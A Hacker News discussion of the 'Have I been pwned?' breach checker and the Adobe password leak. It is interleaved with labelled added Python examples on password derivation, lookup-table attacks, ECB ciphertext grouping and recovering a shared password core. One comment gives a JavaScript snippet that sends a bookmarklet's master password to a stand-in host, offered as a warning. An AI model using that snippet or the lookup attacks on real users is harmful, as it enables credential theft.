Have I been pwned? Check if your email has been compromised in a data breach (haveibeenpwned.com)
491 points by mountaineer 1101 days ago | 283 comments

Shit. Looks like I got caught up in the Adobe breach. Let this be a lesson to all engineers in charge of such situations to implement strong security. You are partially responsible for these disasters.

I got a call from PayPal a week or two ago. It turns out somebody in Indonesia accessed my PayPal account, presumably with credentials scraped from Adobe. I know, I know, shame on me for reusing passwords. Luckily no damage was done and I did a change to the strongest password I've assigned anything yet.

Great job, op (if you're the one who wrote this service) for such an amazing tool. Everyone, if you haven't already, you really should check if you've been compromised. I will be sending this to all my friends.

This should be a lesson not to manage your own passwords; use a password manager, there are many to choose from. I was also caught up in the Adobe breach but my password was randomly generated by my password manager.

I am surprised by how few people are aware of this: https://www.pwdhash.com/

Convenience provided via Chrome/Firefox extensions, portability provided by the website.

I second this. I've been using it for a few years now. It gives me great peace of mind knowing that my password on a site like HN is something like "e5wLoMB1kZ". I only have to remember a few passwords and yet each site has a unique password.

Even in the event of a leak of plain-text passwords I'm still secure in knowing that my other accounts won't be compromised unless there is a very determined attacker.

However, you do have to put some trust in the extension and the website. Fortunately, the website has some good credentials and the extensions have appeared clean... for now.

Yeah, I did not hear about pwdhash and it sounds like a nice idea.

One thing I have noticed though is that when one enters the same site password, you get the same "Hashed" password back to use. Yes, there is an extra step involved here so that buys you some security but I will be cautious in reusing site passwords.

Imagine an attack where for the top 100 sites in the world, all of the most commonly used passwords are used to generate the "Hashed" (pwdhash) passwords for each site and compile that info into a big list. This can then be added to the candidate list of passwords that can be tried in cracking leaked hashes.

The takeaway here is that even though pwdhash gives you domain-specific generated passwords, you will want to make sure that you use a different site password as input to pwdhash for each site.
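As an added example (not code from the thread, and not PwdHash's own algorithm, which uses a different construction), here is a simplified HMAC-based per-site derivation together with the precomputation attack described above: the attacker derives the per-site password once for every (top site, common master password) pair, and a leaked per-site password then looks the master up directly. The site list, the candidate list, the function names and the optional generation counter (the rotation idea some of these tools offer) are constructed for the example.

```python
import base64
import hashlib
import hmac

# Constructed lists for the demonstration; a real attacker would use the
# top-N domains and a leaked-password frequency list.
TOP_SITES = ["example.com", "example.org", "example.net"]
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "monkey"]


def derive_site_password(master: str, domain: str, generation: int = 0, length: int = 10) -> str:
    """Deterministic per-site password: HMAC keyed by the master password over
    the domain plus a generation counter (so one site's password can be rotated
    without changing the master). Simplified stand-in, not PwdHash itself."""
    msg = f"{domain}|{generation}".encode()
    mac = hmac.new(master.encode(), msg, hashlib.sha256).digest()
    return base64.b64encode(mac).decode()[:length]


def build_lookup_table(sites, candidates, length=10):
    """Attacker precomputation: (domain, derived password) -> master.
    Cost is len(sites) * len(candidates) HMACs, paid once, offline."""
    table = {}
    for domain in sites:
        for master in candidates:
            table[(domain, derive_site_password(master, domain, 0, length))] = master
    return table


def recover_master(table, domain, leaked_site_password):
    """Lookup from a leaked plaintext (or cracked) per-site password. None means
    the master was not in the candidate list for that domain and generation."""
    return table.get((domain, leaked_site_password))
```

The table above only covers generation 0, but adding a few more generations multiplies the cost by a small constant, so the counter is not the defence; what stops the lookup is a master password outside any candidate list, or a different master per site as the comment suggests.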

There is also http://supergenpass.com, which uses a JavaScript bookmarklet to do the hashing.

That is an extremely bad idea. Any site you use can put the following JavaScript in their site to obtain your master password next time you use the bookmarklet:

  document.documentElement.addEventListener("DOMSubtreeModified", function() {
    $("#gp2_master").change(function() {
      location.href = "http://example.org/leak/" + $("#gp2_master").val()
    })
  })

You can use an enigmapass or a few of the other browser extensions to avoid this. Also there are iphone and android apps.

I like https://oneshallpass.com/ better since it lets you change some attributes about the passwords generated. So if a site is compromised you can just increment the generation field and get a totally new hash.

Is it protecting from the possibility of web sites being compromised with your data by trusting the website and the extension? How is it better?

It's a start, but you'd need all the mobile platforms on it too.

Eh, that's awesome. There's an Android app, too, so I can use this on my phone.

They don't seem to mention anywhere which hashing algorithm they use. Also, the lengths are quite small. Any idea why?

pwdhash uses a weak hashing mechanism, making it possible to brute-force master passwords. It is OK to use, but make sure that you have a cryptographically strong master password.

I generate passwords with something like:

  printf "/" ; openssl rand -base64 32 | sed 's/.$//'

The leading slash was a nice tip someone gave me to not echo if you accidentally paste the password into IRC... Though if the password itself contains a slash then your client won't consider it a command and will echo it anyway, so do what you will.

Anyway, each new account gets a new password you couldn't beat out of me, though you could probably get my password safe phrase, so do what you will.

Generating long passwords like this highlights providers who enforce password length limits. Paypal's limit is ludicrously short. Hetzner's is limited too.

edit more guff.

Crap, looks like my wife's email was caught up in the Adobe breach. I think she created an account for reading ebooks with Adobe DRM downloaded from our library.

Consider this a heads up for married HN'ers, you should check their emails too.

In Australia, both my wife and I got mailed out letters from Adobe regarding our accounts being potentially compromised. Did that happen elsewhere as well?

I got an email but assumed it was a phishing attempt until I read that they were actually doing this.

Got the same one -- USA

What do you do when you are using a different computer and need to login to site?

I use a YubiKey that outputs half of the password used to unlock my KeePass database; the other half is in my head (so even if they steal my Yubi they can't do much). The database is backed up on my own ownCloud which is hosted on my own VPS and replicated on 3-4 other servers (all mine). My little personal cloud setup.

Call me paranoid but it took me half an hour to set it up and the monthly fees for the servers are very very low.

" … hosted on my own vps … "

Might want to think through whether that really counts as "your own". Who's got hypervisor access to the hardware? Any keys or passphrases that ever hit the disk or memory on someone else's hardware should (at least at some levels of paranoia) be considered "possibly compromised".

(I store "sensitive stuff" on AWS/DigitalOcean/other VPS providers, but only if it's first encrypted locally and the key/passphrase never gets used/stored on the VPS. EncFS works pretty well dealing with that for me... I do, though, "trust" 1Password's datafile encryption enough to take advantage of the iOS/Mac OS X sync features they've implemented over Dropbox. That's possibly not a choice I'd make if I thought I were a target of someone like the NSA.)

For some logins, the answer is "Sorry Dave, I can't do that." If I don't have the private cert, or the ssh cert, or the right hole in the firewall, there are many things I've chosen intentionally not to be able to log in to using someone else's computer.

For less security-critical logins, I've got my password software (1Password) on my phone (and iPad). For some intermediate-level logins, I need my phone or iPad anyway; I've got TOTP two-factor auth (using Google's Authenticator app) on a bunch of important stuff (Amazon/AWS, DigitalOcean, Dropbox, GitHub, the email account that all my domain names are registered with and to which password resets go, and a few other things…)

What will you do if your primary computer gets stolen?

Private SSL/TLS certs, ssh keys, and 1Password database are all stored on encrypted filesystems (EncFS) and synced across four machines (two at work, one at home, and my laptop) using Dropbox (which is another off-site copy, and has revision archives) and/or BTSync. Those four copies are all OS X Time Machine backed up (and revision archived), and two of those Time Machine backups are rsynced nightly to separate drives in opposite locations, so all up (not counting Dropbox) I've got copies on 10 separate spindles in two physical locations, two of them in a locked filing cabinet (the work Time Machine and rsync disks).

I've had a "primary computer" stolen before, and I don't intend to ever have that much grief if (when?) it happens again. I'm confident that even if all the electronics from either one of my work or home get stolen, I could be back into fully productive work mode in half a day and one maxed-out credit card at the local Apple store. (If someone hits both my work and home locations simultaneously, I suspect I've got bigger problems than whether I'll have angry clients shouting at me before the weekend…)

My first question would be "how often does that really happen?". It's a legitimate concern at first sight, but for me, I pretty much never need to do that since I always have my phone with me.

But if I do need to, I have 1Password on my phone as well and can get the passwords from it.

Presumably you can open your password manager's web service and do it from there.

That or use your phone. Most password managers have apps.

Ok, that makes the most sense to me.

I wouldn't want to use a webservice to look at my passwords. I want to open my password safe locally. Less likely to be snooped upon (though still possible, obviously).

I have the encrypted password file on a usb thumb drive. I remember the master password. I view as fatally flawed any password store that uploads the encrypted password file to a remote server.

If you don't mind paying a small annual fee, Lastpass is a very nice tool for automated password management across devices.

Use a browser add-on for exporting/importing passwords, transfer the exports on an encrypted USB stick.

You can have the password repository in Dropbox to sync between different machines, and also use the app.

You can. I would not. I don't want my password file uploaded to any remote server.

I don't. I carry my passwords (via 1Password) on my phone, so I'll just use that.


But I would not really be comfortable using it on an unknown computer, unless I had good knowledge that it was properly administered.

I carry a little piece of paper in my wallet that has my private key further encrypted by myself, and that encrypted key is used to decrypt other passwords through a private web/mobile app I made. The top encryption key I have is just some sort of simple algebraic mumbo jumbo formula I used to scramble my private key just a bit, and I change it up once in awhile, and have that written down. What's in my memory is how I jumbled it.

Well until the recent 4.x / 3.x screwup [1] that 1Password did it has been quite useful (and like you, my 16 character password at Adobe, even if guessed, would not be useful anywhere else)

[1] My 3.x was upgraded to 4.x on my MacBook (unbidden) and the only way to restore compatibility with my 3.x on iOS is to pony up another $20. Can't go back to 3.x on the MacBook, not particularly happy about the upgrade fee on iOS.

FWIW, I think version 4 is a worthwhile upgrade on iOS, and I see the price at $9.99 at the moment (at least in the US store).

It was quite an astonishing move to break 1Password (mine is still broken) when Apple released their own free product.

  > there are many to choose from
This is the reason I don't use one... I still haven't decided which, even if _any_ is better than nothing.

... Aren't password managers the #1 target for hackers nowadays?

Imagine how much that wallet could be worth... How much bribe does the weakest 1Password engineer need?

Then use a local storage one, like password-safe (Win & Mac. password-gorilla for Linux). Combine that with spideroak, dropbox, google drive or whatever file syncing utility you want.

Anyone know what adobe's password requirements were? I don't know which password I used there: Adobe forced me to change it without letting me test the old one.

For the Adobe breach specifically, you might try the site set up by Last Pass, which checks your email against the breached data: https://lastpass.com/adobe/

The added feature is that, if your email is in the list, Last Pass will share with you how many others had your same password -- and the list of all password hints associated with that password. If more than a handful of others used the same password, that should jog your memory about which you used.

P.S. I'm not associated with Last Pass and actually use a different product. But I found this site very helpful.

This is beautiful. Thank you so much. I'd been getting really frustrated not knowing which passwords I'd needed to change but my hint was enough!

You can just torrent users.tar.gz (the leaked list of encrypted passwords) and then grep the file for your email address, which will give you the encrypted version of your password.

...which does not really help without the crypto-key - even if you know a list of possible passwords you cannot test them.

Well, funnily enough, if you know your password and it was in the leak, you can test it against your own password.

lastpass.com/adobe will show you the list of hints of yourself and other users that used the password.

Wonderful. sarcasm

> Great job, op (if you're the one who wrote this service)

Looks like no.

"Have I been pwned?" is by Troy Hunt http://www.troyhunt.com/

The OP's bio indicates that they are someone else. https://news.ycombinator.com/user?id=mountaineer

I got pwned by adobe too. Luckily password there was one of my "weak" ones, and I do not use it anywhere of importance.

Same here. I used my throw-away email to sign up at Adobe, along with my weak throw-away password. I don't have any Adobe licenses or such. The only Adobe product I use is the Flash plugin.

The email account is on Hotmail and currently has about 54k messages in its inbox, 99.9% unread. I use it to create accounts on news sites and annoying fora and such, always with the same weak password. About the only time I log into it is to respond to password confirmation requests generated during account creations.

Originally, the weak password was also my email password. However, a few years ago, the email account got hacked severely, such that MSFT wouldn't let me in until I reset the password. It now has a strong password.

That's not very "lucky," it seems very intentional.

I had a very insecure password on adobe.com. i.e. low-enough entropy that 55 users had the exact same password. I figured since Adobe do not have my credit card number and there is nothing to gain by impersonating me on that site, it did not matter. I have not used the same email/password combination elsewhere, but even if I did it would only be on other low-value accounts. I'm not worried about attackers finding it by association either (they will have it already from dictionary attacks.)

I had something similar happen to one of my Windows Live accounts. Someone somehow broke into it and, although I did not have any credit card information, they decided to continue to use it. They added a stolen credit card to the account. I received an email in Japanese from Xbox Live (! I have never owned an Xbox, someone converted my account, nor do I speak Japanese) at one point which prompted me to call their support and figure all of this out.

But the point I'm trying to get across is, if I were unlucky that could have turned into a HUGE mess where I was accused of stealing said credit card. Luckily that did not occur (probably because they could trace it to a separate IP address.. and I don't own an Xbox). I no longer use passwords as insecure as I did for that account - I had to deal with this headache while at my family's Christmas party as well (because that is when I received the email), which made it even more irritating.

It was lucky in a sense that if Adobe had required complex passwords, a more important password would have been leaked. It was also lucky in a sense that Adobe itself got hacked instead of an entity that has one of my more sophisticated and thus valuable passwords.

One of my addresses was also in the Adobe breach. No idea what password I used there, but I'm fairly sure it must have been either my common "junk" password, shared with tons of forums, but nothing that poses any serious risk to me (just to those forums). Or if they had stricter requirements, some variation on it that I always forget, so I have to ask them for a new password every time anyway.

I certainly don't reuse financial or email passwords. Or actually I do, but only for financial and email stuff. But I probably shouldn't reuse them at all.

But those forums? I'm just not going to keep track of a new password for every site I visit.

If you're using a forum, you're in front of a computer. Keeping track of things is one of the things computers are _best_ at. Get yourself a password manager. I use 1Password, but I hear good things about KeePass and LastPass too.

Seriously - you can't manage 2013 grade password complexity requirements for all the places you need passwords in your head any more (it's likely you never could…)

Get a tool to help, computers are wonderful tools.

I've got KeePass, but I haven't used it remotely as long as I've used many websites. Also, I don't have my KeePass DB in Dropbox, so I can't access it from other computers.

More than that, I'd rather not put my KeePass DB on someone else's machine in the first place. But I'll easily trust strange computers with a password for some crappy forum.

There's always something you risk compromising. I prefer some forum account to be compromised.

My wife was on the Adobe list; the same credit card she used at Adobe was charged from Amazon or PayPal (I can't remember which) a couple of weeks after the leak. She called the bank, they closed it right away and took the charges off the card.

I woke up this Thanksgiving with a bunch of email notifications from PayPal that my account had been hacked and taken over. I (also shame on me) tend to reuse some of my passwords, and figured someone got into my PayPal account using my Adobe credentials, not even being sure if I had created an account with Adobe for anything in the past.

I checked my email address on this site and it didn't find any pwnage.

I'm relieved my email address isn't in any of these leaks, but also now concerned about whatever it was that let someone into my paypal account so easily...

If you reuse passwords, separate throw-away accounts (like Adobe or pretty much anything that's not your email, your bank or PayPal), from the important stuff.

Sites that need to be secure, hopefully really are secure. Sites that don't really need to be secure because they don't deal in anything of value, probably don't invest quite as much in security. Reusing passwords across those different kinds of sites means the extra security of the secure sites is wasted.

Of course it's way better not to reuse at all, but remembering two or three passwords is a lot easier than dozens, and still a lot safer than just one.

> Looks like I got caught up in the adobe breach.

I knew I was, but I was delighted by what Dreamhost did: they cross-checked their users' e-mails with the leaked Adobe database and sent a message [1] to affected users explaining the situation and advising them to change the password, reminding them not to re-use passwords and suggesting password vaults.

I think it's a great thing to do by third-parties when leaks of this magnitude happen.

[1] Full text: http://pastebin.com/2AkU0v98

Have fun closing your account by the way, I went through that fiasco recently. I regularly run the LastPass security challenge and an old email of mine was in the Adobe breach too.

49 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ..5 mins.. 48 customers are in line ahead of you. ARG!

After the Macrumors breach (I had only signed up about 2 weeks before it happened), I decided it was time to make all my passwords unique and to use a credentials manager like 1Password. I too shared the same password for multiple sites/services (shame on me too).

Fuck me. Ditto. The reason I checked? I unknowingly, until today, had a domain name transferred away from me -- or rather, ownership changed, for a domain I bought years ago for $3,000. Email address used for that domain in Adobe breach.

Looks like I was caught in Adobe breach as well. Luckily I use one off passwords for each site I log into. Damn.

Yahoo here. How the hell did the hackers get the passwords in plain text? Were they seriously unencrypted?

They were encrypted, but with no variation between the hashes per email. https://lastpass.com/adobe/ will show you the password hints associated with the (in my case) 200 people with the same (hashed) password. The clues would be sufficient to guess the password.
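Added example, not code from the thread or from any tool it mentions, covering both the LastPass hint lookup described earlier and the "no variation per email" point above. Adobe's dump held passwords encrypted with 3DES in ECB mode rather than hashed, so equal passwords gave byte-identical ciphertexts and passwords sharing their first 8 bytes shared their first ciphertext block. Python's standard library has no 3DES, so the block function below is a keyed stand-in (an HMAC truncated to 8 bytes) that keeps the one property that matters here: equal plaintext block in, equal ciphertext block out. The key, the user records and the hints are constructed.

```python
import hashlib
import hmac
from collections import defaultdict

BLOCK = 8  # 3DES block size in bytes

# Constructed stand-in for the server-side secret key. ECB leaks structure no
# matter how strong the key is, which is the point of the example.
_KEY = b"constructed-demo-key"


def _ecb_block(block: bytes) -> bytes:
    """One 8-byte block 'encryption'. Stand-in for 3DES (not in the stdlib):
    deterministic and keyed, so equal input blocks give equal output blocks."""
    return hmac.new(_KEY, block, hashlib.sha256).digest()[:BLOCK]


def ecb_encrypt(password: str) -> bytes:
    """PKCS#7-pad the password to a multiple of BLOCK and encrypt block by
    block with no IV and no chaining, which is what ECB mode does."""
    data = password.encode()
    pad = BLOCK - len(data) % BLOCK
    data += bytes([pad]) * pad
    return b"".join(_ecb_block(data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))


# Constructed user records: (email, plaintext password, hint). Only the email,
# ciphertext and hint appear in a dump; the plaintext is here to build one.
SAMPLE_USERS = [
    ("a@example.com", "123456", "numbers"),
    ("b@example.com", "123456", "1 to 6"),
    ("c@example.com", "123456", ""),
    ("d@example.com", "hunter2", "irc"),
    ("e@example.com", "password1234", "obvious"),
    ("f@example.com", "password12xx", "obvious with xx"),
]
RECORDS = [(email, ecb_encrypt(pw), hint) for email, pw, hint in SAMPLE_USERS]


def group_by_ciphertext(records):
    """{ciphertext: [(email, hint), ...]}. With ECB and no per-user salt, one
    group is one password, across every user who chose it."""
    groups = defaultdict(list)
    for email, ct, hint in records:
        groups[ct].append((email, hint))
    return dict(groups)


def hints_for_same_password(records, email):
    """What the LastPass checker reports: the non-empty hints of everyone whose
    ciphertext equals this user's. A few hints for one password usually give it away."""
    ct = next(c for e, c, _ in records if e == email)
    return [h for _, h in group_by_ciphertext(records)[ct] if h]


def shared_prefix_blocks(ct_a: bytes, ct_b: bytes) -> int:
    """Leading ciphertext blocks two records share. Under ECB that equals the
    number of leading 8-byte plaintext chunks they share, so a cracked
    'password1234' also reveals the first 8 characters of 'password12xx'."""
    n = 0
    for i in range(0, min(len(ct_a), len(ct_b)), BLOCK):
        if ct_a[i:i + BLOCK] != ct_b[i:i + BLOCK]:
            break
        n += 1
    return n
```

A salted, slow hash (bcrypt, scrypt, PBKDF2) would have put every user in a group of one and made the hints useless to anyone but their owner.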

I've gone to generating a unique password with a simple random number generator if the end site supports password recovery (in case Chrome's password memorizing system forgets it).

  #!/bin/bash
  # Length from the first argument, default 16.
  if [ -n "$1" ] ; then
    a=$1
  else
    a=16
  fi
  # dd reads 1000 bytes; only the alphanumeric ones survive (about 62/256 of
  # them, roughly 240 characters). tr -d -c "[:alnum:]" is rejection, not
  # modulo, so it does not bias the output. The later tr calls are no-ops,
  # since -c "[:alnum:]" already removed every non-alphanumeric byte.
  dd if=/dev/urandom bs=1000 count=1 2>/dev/null | tr -d -c "[:alnum:]" | tr -d '`' | tr -d "'" | tr -d '"' | tr -d '\\' | head -c "$a"
  echo

This is not meant as criticism: Is there any particular reason for all the tr pipes? Is there any advantage to using tr instead of base64?

I essentially use the following:

  # base64 wraps its output, so strip the newlines before counting characters
  # (otherwise head -c counts them toward $COUNT); the alphabet includes + and /.
  base64 </dev/urandom | tr -d '\n' | head -c "$COUNT"; echo

Criticism welcome. Yours is nicer.

I use this for a little more entropy:

    # LC_ALL (not LANG) wins if any LC_* variable is set; note that [:print:] includes the space.
    LC_ALL=C tr -dc "[:print:]" < /dev/urandom | fold -w 32 | head -n 1

I much prefer using the program `pwgen`. It's installed on all my Linux boxes and it's available from Cygwin too, and it generates a 'pronounceable' password, which makes it a lot easier to remember and also much easier to copy.

There's also the benefit of fewer moving parts -- with a pipeline like that, I'd be worried about accidentally stripping out some of the randomness. I'm fairly confident that a simple invocation of `pwgen` will work.
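Added example, in Python rather than the shell pipelines above (it is not code from any commenter): an unbiased generator with an entropy calculation, beside the modulo shortcut that the pipelines happen to avoid. The alphabets are the ones `[:alnum:]` and `[:print:]` select in the C locale; the names and the 128-bit target are the example's own choices.

```python
import math
import os
import secrets
import string

# Same alphabets the shell pipelines select, in the C locale.
ALNUM = string.ascii_letters + string.digits                                 # [:alnum:], 62 symbols
PRINTABLE = string.digits + string.ascii_letters + string.punctuation + " "  # [:print:], 95 symbols


def generate(length: int, alphabet: str = ALNUM) -> str:
    """Unbiased password: secrets.choice draws with rejection sampling, the
    same thing tr -dc does when it discards bytes outside the class."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


def entropy_bits(length: int, alphabet_size: int) -> float:
    """Bits of entropy of a uniformly chosen password of this length."""
    return length * math.log2(alphabet_size)


def length_for_bits(target_bits: float, alphabet_size: int) -> int:
    """Shortest length that reaches the target, e.g. 128 bits over 62 symbols."""
    return math.ceil(target_bits / math.log2(alphabet_size))


def biased_generate(length: int, alphabet: str = ALNUM) -> str:
    """The shortcut to avoid: one random byte reduced modulo the alphabet size.
    256 % 62 == 8, so alphabet[0:8] each come up 5/256 of the time and the
    other 54 symbols 4/256. Included only so the bias can be measured below."""
    return "".join(alphabet[b % len(alphabet)] for b in os.urandom(length))


def modulo_probabilities(alphabet_size: int, byte_range: int = 256):
    """Exact per-symbol probability under byte % alphabet_size (no sampling)."""
    counts = [0] * alphabet_size
    for b in range(byte_range):
        counts[b % alphabet_size] += 1
    return [c / byte_range for c in counts]
```

For a 16-character alphanumeric password this gives about 95 bits; 22 alphanumeric or 20 printable characters reach 128 bits. The modulo bias is small per character (5/256 versus 4/256) but it is systematic, and a guesser who knows the generator can order candidates to exploit it; rejection sampling costs nothing and removes it.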

Mine showed for Adobe as well, but I don't have an account with Adobe?

It’s a bummer to find my e-mail between the leaked Adobe accounts. Especially after the ordeal I had to go through to have my Adobe account “deleted” months ago:

You have requested that we deactivate your Adobe account. We have sent a request to the relevant team to process your request. Please note that you will lose access to Adobe services and support for which you have registered or paid for. You will not be able to obtain serial numbers for past purchases and the deactivation process may take up to ninety (90) days. Once completed, your adobe.com membership and all personal data will be deleted from our database.

Adobe, every single time I had anything to do with you it sucked. Big time.

It took 120+ days for my eBay account to get deleted, but thankfully I could delete my PayPal in only a few weeks.

The 120+ days thing with eBay is allegedly because they need to make sure any outstanding deals are closed and accounts settled.

Of course that is absolute bullshit, it took them 120+ days to close my account and I had not used it for over 4 years at that point. They actually emailed me telling me that they were closing the account due to inactivity. They gave me 3 or 4 months to log on before it would be killed, so I thought to myself "good, saves me the hassle of doing it myself". Fast forward 3-4 months and I get an email telling me my account was compromised. Weird... so I log on, confirm any payment info I had was long since expired, confirm nothing had happened and that my password was intact... then I scrambled the security question and password just to be safe and told eBay to delete the account. Cue "this will take 120+ days" bullshit... but whatever.

At nearly the end of that 120+ days I get emailed again telling me the account was compromised. I'm convinced this is a scam they run to trick you into logging into your account, thus resetting the the countdown.

eBay and PayPal are among my least trusted companies. I have a higher opinion of even Comcast or Halliburton.

I think my story pretty much echoes yours; I'd stopped using PayPal for a couple of years, and stopped using eBay.

I cancelled and about three months later I was "compromised". At that point I reset the data to random values, deleted my "ebay@example.com" email alias, and just resigned myself to forgetting about it.

Common tactic as far as I can tell, other companies do the same thing. eg: My Blizzard account that I can't sign in to because it's cancelled has somehow been 'compromised' multiple times.

Funny/scary anecdote I experienced a few days ago: most Linux flavors check against the cracklib database when changing passwords, and as I typed in an account password, a brand-new cracklib said it was based on a dictionary word. Now, my passwords are alphanumerical jumble, and they're usually comprised of an alphanumerical jumble "core" that I memorize and then a site-based or computer-based pre- and suffix.

So, let's say for example, my current core is "kgA85kjF3". Then for example, I'd morph that for my Hacker News account to "ZkgA85kjF39!" and my fileserver as "UkgA85kjF3O2". I thought this was a good method of having reasonably long passwords but I'd have to memorize very little per site.

So imagine my surprise, when I created a new password "NkgA85kjF3T3", cracklib found a dictionary word in it. It got worse from there. Through experimentation, I determined that it was indeed the core that was compromised. Any password containing "kgA85kjF3" was compromised.

I have no idea how this happened. If this was not a big cosmic coincidence, if this is not just a random regex filter accident, that means data from at least two known password databases containing my cores has been correlated, and put into cracklib no less. There is really no limit to the imagination regarding what illegitimate databases might contain...

I do something similar, but I then hash the result and use that as the password. That way, if someone gets hold of a couple of passwords, it's harder to derive the "core".
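Added example, not code from either commenter: what an attacker holding two or three of one user's leaked passwords does with a shared "core" plus per-site affixes, namely take the longest common substring, and why the hashed variant in the reply resists it. The core string reuses the thread's own illustrative value; the affixes and the hashing scheme are constructed for the example.

```python
import hashlib
from difflib import SequenceMatcher

# The core reuses the thread's illustrative value; the affixes below are constructed.
CORE = "kgA85kjF3"


def scheme_plain(core: str, prefix: str, suffix: str) -> str:
    """The scheme described above: a memorised core wrapped in per-site affixes."""
    return prefix + core + suffix


def scheme_hashed(core: str, prefix: str, suffix: str, length: int = 16) -> str:
    """The reply's variant: hash the composed string, so the core never appears
    literally in any site password (constructed choice of SHA-256, truncated)."""
    return hashlib.sha256((prefix + core + suffix).encode()).hexdigest()[:length]


def longest_common_substring(a: str, b: str) -> str:
    """Longest run of characters present in both strings."""
    m = SequenceMatcher(None, a, b, autojunk=False).find_longest_match(0, len(a), 0, len(b))
    return a[m.a:m.a + m.size]


def recover_core(leaked: list) -> str:
    """Attacker side: the longest substring common to every leaked password is
    the candidate core, which then goes into the cracking dictionary with every
    affix pattern. Two plaintext leaks are enough for the plain scheme."""
    core = leaked[0]
    for pw in leaked[1:]:
        core = longest_common_substring(core, pw)
    return core
```

Run against the plain scheme, three leaked passwords give the core back exactly; run against the hashed scheme, what comes back is a few hex characters of coincidence. The hashed variant still has the weakness the next comment points out, which is that it needs a tool at hand to compute, and it still rests on the secrecy of one core.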

That's a good procedure, a few weeks ago I'd have deemed you paranoid but obviously there is no practical limit to paranoia anymore ;)

However, the hashing step makes it impractical for me on different devices in certain situations. I don't want to rely on browser extensions or apps either. So I'm changing my passwords to the output of an algorithm I can do in my head now.

For those who aren't aware https://www.pwdhash.com/

Yeah, though I don't use it, since I only found out about it after I had been using my own system for a while.

I do the same, and my "core" is less obscure than yours. I'm worried. What is this cracklib thing? Do I just provide it my password and it tells me stuff?

It's a linux library that checks passwords against a database of known words and patterns. You give it a password and it gives you basically one of two answers: "this is based on a known word" or "nope, never seen anything like it before". The database format looks highly obscure and doesn't lend itself to grepping without much effort.

Is there an easy way to check a password using cracklib via the command line? Preferably on OS X.

It doesn't come with OS X, but I suppose there should be a port available somewhere. Otherwise, Virtualbox and some minimal distro are probably your best bet.

On Linux command line, you just feed the password to it:

  echo "password" | cracklib-check

  brew install cracklib cracklib-words

  echo "lol" | cracklib-check


You can also use an algorithm. I do something like create a 'base' that is used for all sites. And then something like take the number of letters in the url google = 6 and add it the beginning. Then take the second letter from the right and last, 'o' and 'e' and add it to the end. In the end you get 6baseoe. Unique password for each website.

Passphrases are a really good idea, but a lot of sites have very short length limits.

Granted, if they have limits that's a really big red flag that they're storing your password in plain text, as a hash should always be the same length, so you probably shouldn't sign up there anyway. I remember a few years ago I was signing up for a TD account, and about 5 pages through the signup page it wouldn't allow me to continue because my password was /too secure/ (not their exact wording, but that was basically the problem). What makes it funnier is a lot of sites would reject the password I used at the time as not being secure enough.

I stopped signing up at that point, but I remember getting a phone call (!) from them a couple days later asking why I didn't finish the sign up, and my answer was: because I'm not giving my money to a company that doesn't know how to store passwords!

In Australia, our "welfare" system is taken care of by Centrelink. They have all of your personal details, as well as access to the amount you're getting per fortnight, and job history, resume etc. Lots of stuff you don't want compromised.

They also limit your password to 8 characters.

This is a huge government website that heaps of Australians have to access at least fortnightly.

One of the benefits of learning to program J for me has been to make it easy to remember hard to crack passwords. I have some passwords which are actually runnable J on-liner programs and contain all kind of '#!$' symbols. All I need to do is remember what they do so that I can recreate them.

I've memorized an algorithm instead of trying to remember passwords. I don't actually remember hardly any of my passwords, instead I use this mini algorithm that I came up with to create unique passwords for each site I go to. Each time I go to a site it just takes me a couple seconds to figure out what the password is. I find it a lot easier to remember that one algorithm rather than trying to remember a bunch of passwords or rotating through the same few passwords.

What I've found is that some sites will either truncate your password without telling you or restrict you to 8-20 chars.

Sometimes sites limit you, my bank for example has an 8 character limit.



That's not the point. The idea is to have different passwords for each site and each device. So in this many-words scheme (which will run afoul of a lot of websites' length restrictions on passwords by the way) I'd have to find a good way to encode the site's name or I'd have to tack on at least four specific words to the existing core sentence. That's not something I'll remember with dozens of sites and devices.

Wow, got downvoted for that. I wouldn't have thought this description of how I do passwords is so controversial.

What's so bad about it?


Not to be a spoilsport, but don't most sites allow spaces in passwords anyway?

Most do but some filter for it. Really varies site to site.

Believe me when I say all your personal information is on SOMEONE'S computer. Everyone's is.

I know. If I wanted my information to be "safe", I wouldn't have an online profile at all. For starters, I wouldn't use Google services. It's a matter of limiting exposure at this point. I know the NSA reads my email and can probably log into my home router, but I don't want everybody else to do the same. Otherwise, let's all change our passwords to "password" and be done with it. Just because protection isn't close to 100% doesn't mean I don't want any at all.

can you tell me more about what you mean? for instance if your wife sends you a nude picture through something like oovoo does that guarantee someone has stolen it?

If you're connected to the world wide web and you send/receive data, there's a strong chance that either:

a) Either sending/receiving machine is broken into

b) Someone or something is intercepting your message

c) The service you are using is broken into

There's just too many holes to plug and too many people with expertise in these domains orders of magnitude above ours that they can use to either be malicious, or help our cause.

Your computer/device needs to be secure. Your other parties' devices need to be secure. Your connection needs to be secure. Your third party's service needs to be secure. The internet the third party uses needs to be secure. Their data centre needs to be secure. Then their ISP needs to be secure.

All data is online.

I hope only the crypto-hash of my password is stored.

LastPass has a similar service for some of the recent (and not so recent) hacks:

* https://lastpass.com/adobe/

* https://lastpass.com/linkedin/

* https://lastpass.com/lastfm/

* https://lastpass.com/eharmony/

If you use LastPass, then their security check will run these checks automatically against all leaks and email addresses:


Thanks for that; I had ignored the Adobe leak, because why would I have created an Adobe account? Turns out I did at some point, so I guess I'm the goat there.

Often you need to create an account or somehow register your email at sites, just to get something very basic, like a free download, or use a feedback form.

This demonstrates nicely why that's a bad idea.

http://www.bugmenot.com/ is useful for such a case, registration required for a download.

I entered my address out of curiosity and it told me I had an Adobe account. I can't remember ever creating one so I tried the password reset process. Adobe tells me there doesn't exist an account under that address.

How is this possible? How did Adobe leak my address if I don't even have an account?


The LastPass checker is really nice. What's scary is that it found a few other people that had the same password as me.

For the Adobe breach, LastPass also emails you a sample of the password hints of others -- it's kind of funny how people remember a certain string.

The crazy thing is my simple password was used by 5 other people. Luckily my email password is much more complicated.

For those freaking out about somebody "misusing" this information (your e-mail address) .... I have some bad news.

E-mail addresses are not secret. They cross the wire in plaintext, they get stored in various mail server logs in various relays across the globe, they get passed around by spam analysis services, anti-virus services, and any company you submit it to has the right to sell it and any other information about you to anyone they want, without your consent.

"Although partial regulations exist, there is no all-encompassing law regulating the acquisition, storage, or use of personal data in the U.S. In general terms, in the U.S., whoever can be troubled to key in the data, is deemed to own the right to store and use it, even if the data were collected without permission." [1]

